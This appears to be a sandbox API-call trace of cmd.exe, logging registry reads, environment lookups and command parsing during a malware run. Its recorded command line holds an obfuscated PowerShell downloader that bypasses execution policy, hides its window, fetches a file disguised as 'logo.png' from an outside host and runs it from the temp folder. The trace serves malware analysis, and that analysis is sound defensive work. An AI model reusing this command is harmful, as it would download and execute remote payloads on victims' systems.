	[0055.129] __set_app_type (_Type=0x1) 
	[0055.129] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0055.129] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0055.130] GetCurrentThreadId () returned 0x840
	[0055.130] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x840) returned 0x3c
	[0055.130] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0055.130] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0055.130] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0055.130] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0055.130] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f918 | out: phkResult=0x14f918*=0x0) returned 0x2
	[0055.130] VirtualQuery (in: lpAddress=0x14f900, lpBuffer=0x14f880, dwLength=0x30 | out: lpBuffer=0x14f880*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0055.130] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f880, dwLength=0x30 | out: lpBuffer=0x14f880*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0055.130] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f880, dwLength=0x30 | out: lpBuffer=0x14f880*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0055.131] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14f880, dwLength=0x30 | out: lpBuffer=0x14f880*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0055.131] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f880, dwLength=0x30 | out: lpBuffer=0x14f880*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0055.131] GetConsoleOutputCP () returned 0x1b5
	[0055.131] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0055.131] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0055.131] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.131] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0055.131] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0055.132] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0055.132] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.132] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0055.132] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.132] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0055.132] GetEnvironmentStringsW () returned 0x238f20*
	[0055.132] GetProcessHeap () returned 0x220000
	[0055.132] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xad4) returned 0x239a00
	[0055.133] FreeEnvironmentStringsW (penv=0x238f20) returned 1
	[0055.133] GetProcessHeap () returned 0x220000
	[0055.133] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x8) returned 0x2387a0
	[0055.133] GetEnvironmentStringsW () returned 0x238f20*
	[0055.133] GetProcessHeap () returned 0x220000
	[0055.133] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xad4) returned 0x23a4e0
	[0055.133] FreeEnvironmentStringsW (penv=0x238f20) returned 1
	[0055.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7d8 | out: phkResult=0x14e7d8*=0x44) returned 0x0
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x18, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.133] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.133] RegCloseKey (hKey=0x44) returned 0x0
	[0055.133] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7d8 | out: phkResult=0x14e7d8*=0x44) returned 0x0
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7d4*=0x4) returned 0x0
	[0055.134] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7d0, lpData=0x14e7f0, lpcbData=0x14e7d4*=0x1000 | out: lpType=0x14e7d0*=0x0, lpData=0x14e7f0*=0x9, lpcbData=0x14e7d4*=0x1000) returned 0x2
	[0055.134] RegCloseKey (hKey=0x44) returned 0x0
	[0055.134] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e45
	[0055.134] srand (_Seed=0x5d3b2e45) 
	[0055.134] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0055.134] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0055.134] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0055.134] GetProcessHeap () returned 0x220000
	[0055.134] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x238f20
	[0055.134] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x238f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0055.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0055.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0055.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0055.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0055.135] GetProcessHeap () returned 0x220000
	[0055.135] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239a00 | out: hHeap=0x220000) returned 1
	[0055.135] GetEnvironmentStringsW () returned 0x239140*
	[0055.135] GetProcessHeap () returned 0x220000
	[0055.135] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xaec) returned 0x23bad0
	[0055.135] FreeEnvironmentStringsW (penv=0x239140) returned 1
	[0055.135] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0055.135] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.135] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0055.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0055.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0055.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0055.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0055.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0055.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0055.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0055.136] GetProcessHeap () returned 0x220000
	[0055.136] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x238d80
	[0055.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f5e0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0055.136] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x14f5e0, lpFilePart=0x14f5c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14f5c0*="Documents") returned 0x1b
	[0055.136] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0055.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f2f0 | out: lpFindFileData=0x14f2f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x23c5d0
	[0055.136] FindClose (in: hFindFile=0x23c5d0 | out: hFindFile=0x23c5d0) returned 1
	[0055.136] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x14f2f0 | out: lpFindFileData=0x14f2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x23c5d0
	[0055.136] FindClose (in: hFindFile=0x23c5d0 | out: hFindFile=0x23c5d0) returned 1
	[0055.136] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x14f2f0 | out: lpFindFileData=0x14f2f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x23c5d0
	[0055.137] FindClose (in: hFindFile=0x23c5d0 | out: hFindFile=0x23c5d0) returned 1
	[0055.137] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0055.137] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0055.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0055.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0055.137] GetProcessHeap () returned 0x220000
	[0055.137] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23bad0 | out: hHeap=0x220000) returned 1
	[0055.137] GetEnvironmentStringsW () returned 0x23afd0*
	[0055.137] GetProcessHeap () returned 0x220000
	[0055.137] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb2c) returned 0x23bb10
	[0055.137] FreeEnvironmentStringsW (penv=0x23afd0) returned 1
	[0055.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0055.137] GetProcessHeap () returned 0x220000
	[0055.137] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x238d80 | out: hHeap=0x220000) returned 1
	[0055.137] GetProcessHeap () returned 0x220000
	[0055.137] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4016) returned 0x23c650
	[0055.138] GetProcessHeap () returned 0x220000
	[0055.138] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x260) returned 0x239c80
	[0055.138] GetProcessHeap () returned 0x220000
	[0055.138] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23c650 | out: hHeap=0x220000) returned 1
	[0055.138] GetConsoleOutputCP () returned 0x1b5
	[0055.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0055.138] GetUserDefaultLCID () returned 0x409
	[0055.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0055.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2
	[0055.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="1") returned 2
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0055.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0055.139] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0055.140] GetProcessHeap () returned 0x220000
	[0055.140] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x20c) returned 0x239f60
	[0055.140] GetConsoleTitleW (in: lpConsoleTitle=0x239f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0055.140] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0055.140] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0055.140] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x23c650
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4010) returned 0x240670
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x2349a0
	[0055.146] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2349a0 | out: hHeap=0x220000) returned 1
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x240670 | out: hHeap=0x220000) returned 1
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4010) returned 0x240670
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x2349a0
	[0055.146] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2349a0 | out: hHeap=0x220000) returned 1
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x240670 | out: hHeap=0x220000) returned 1
	[0055.146] GetProcessHeap () returned 0x220000
	[0055.146] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23c650 | out: hHeap=0x220000) returned 1
	[0055.147] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0055.148] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0055.148] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0055.148] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0055.148] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0055.148] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0055.148] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0055.148] GetProcessHeap () returned 0x220000
	[0055.148] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x23a180
	[0055.148] GetProcessHeap () returned 0x220000
	[0055.148] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x30) returned 0x2369a0
	[0055.148] GetProcessHeap () returned 0x220000
	[0055.148] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x14) returned 0x238d80
	[0055.148] GetProcessHeap () returned 0x220000
	[0055.148] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x23a240
	[0055.149] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0055.149] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0055.149] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0055.149] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0055.149] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0055.149] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0055.149] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0055.149] GetProcessHeap () returned 0x220000
	[0055.149] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x23a300
	[0055.149] GetProcessHeap () returned 0x220000
	[0055.149] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2e) returned 0x2369e0
	[0055.154] GetConsoleTitleW (in: lpConsoleTitle=0x14f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0055.155] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
